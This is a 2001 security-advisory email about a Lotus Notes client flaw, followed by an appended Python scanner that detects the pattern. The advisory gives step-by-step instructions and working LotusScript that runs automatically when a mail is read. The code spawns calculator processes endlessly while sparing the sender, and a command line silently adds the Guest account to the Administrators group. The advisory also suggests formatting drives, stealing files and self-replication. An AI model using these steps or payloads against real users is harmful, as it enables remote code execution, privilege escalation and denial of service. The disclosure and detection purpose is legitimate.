[NEWS] Attacking a Lotus Notes Client
From: support@securiteam.com
Date: 10/24/01
From: support@securiteam.com
To: list@securiteam.com
Subject: [NEWS] Attacking a Lotus Notes Client
Message-Id: <20011023221037.0ED4A138BF@mail.der-keiler.de>
Date: Wed, 24 Oct 2001 00:10:37 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Attacking a Lotus Notes Client
------------------------------------------------------------------------
SUMMARY
A security vulnerability in Lotus Notes Mail allows a user to create
LotusScript (an internal interpreted language) with malicious intent
and have it execute outside the recipient's control.
DETAILS
Vulnerable systems:
Lotus Notes Client 5 All releases
Lotus Notes Client 4.6 All releases
With a little LotusScript in your mail, you can execute anything you want
on the recipient's computer, even outside of Notes.
Follow these steps:
1) Create a new mail, add recipients
2) Go to the body and click in the menu "Create..Object"
3) Select "Control" and any object you please, such as "ActiveXPlugin Object"
4) Do one of the following:
In Client 4.6, right-click on the object to get "Properties"
In Client 5, click the new "Applet" feature in the menu, go to
"Properties", then check "run the object when the document is read"
5) Then select "Edit events": an event pane opens, linked to the object
6) In the "Initialize" section, add the following code, where "My EMAIL" is
your Lotus Notes account name (if you get this part wrong, you will bomb
yourself):
Sub Initialize
    Dim TaskId As Integer
    Dim session As New NotesSession
    If session.CommonUserName<>"My EMAIL" Then
        Do
            TaskId%=Shell("CALC.EXE",1)
        Loop
    End If
End Sub
7) In the "Terminate" section, do the same:
Sub Terminate
    Dim TaskId As Integer
    Dim session As New NotesSession
    If session.CommonUserName<>"My EMAIL" Then
        Do
            TaskId%=Shell("CALC.EXE",1)
        Loop
    End If
End Sub
8) Click again on the "Initialize" section
9) Hit the "Send" button
Your ActiveX (or other object you choose) is executed during the reading
of the document.
In this example we just run the calculator in a loop, but the
possibilities are endless: formatting hard drives, sending emails,
replicating the script to send it to the whole address book, sending
files, stealing files from the victim's hard drives without the victim
noticing, and more.
For instance, you could replace the Do .. Loop with:
TaskId%=Shell("CMD.EXE /C net localgroup "
\"Administrators"\" /add guest ",1)
Which will silently add the Guest account to the Administrative group.
NOTE: The SMTP gateway does not let LotusScript pass through, making this
an internal threat only.
Solution:
The only solution is to deactivate the preview, and to delete the memo
before reading it.
ADDITIONAL INFORMATION
The information has been provided by <mailto:irib@bunker.freexion.net>
Yann.
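
A defender-side check for the pattern described in this advisory, as an added example that is not part of the original message or of any Lotus tooling: it scans LotusScript event source for Shell() calls, flagging those in the Initialize/Terminate handlers, unbounded Do...Loop bodies and CommonUserName gating. It assumes the script text has already been exported from the mail item; `scan`, `analyze` and the sample input are hypothetical names and constructed data.

```python
import re

# Constructed sample: event source assumed to be already exported from a mail
# item's embedded object (the export step is outside this example).
SAMPLE = '''Sub Initialize
Dim TaskId As Integer
Dim session As New NotesSession
If session.CommonUserName<>"Some User" Then
Do
TaskId%=Shell("CALC.EXE",1)
Loop
End If
End Sub
Sub Click
Print "hello"
End Sub
'''

AUTO_EVENTS = {"initialize", "terminate"}  # handlers used in the advisory
F = re.I | re.M | re.S
SUB_BLOCK = re.compile(r"^\s*Sub\s+(\w+)[^\n]*\n(.*?)^\s*End\s+Sub\b", F)
SHELL = re.compile(r"\bShell\s*\(", re.I)
# Bare Do ... bare Loop (no While/Until) with no Exit Do / Exit Sub in between.
UNBOUNDED = re.compile(
    r"^\s*Do\s*$(?:(?!\bExit\s+(?:Do|Sub)\b).)*?^\s*Loop\s*$", F)

def analyze(name, text, first):
    """Return a finding for one Sub body, or None if it never calls Shell()."""
    lines = [n for n, t in enumerate(text.splitlines(), first) if SHELL.search(t)]
    if not lines:
        return None
    reasons = ["Shell() call"]
    if name.lower() in AUTO_EVENTS:
        reasons.append("runs automatically on " + name)
    if "commonusername" in text.lower():
        reasons.append("gated on CommonUserName")
    if UNBOUNDED.search(text):
        reasons.append("unbounded Do...Loop")
    return {"event": name, "lines": lines, "reasons": reasons}

def scan(source):
    """Analyze every Sub ... End Sub block and collect the findings."""
    out = []
    for m in SUB_BLOCK.finditer(source):
        first = source.count("\n", 0, m.start(2)) + 1  # line number of body start
        finding = analyze(m.group(1), m.group(2), first)
        if finding:
            out.append(finding)
    return out
```

Nested loops and Shell() calls hidden behind string building or comments are not handled; the check covers the literal pattern shown in the advisory.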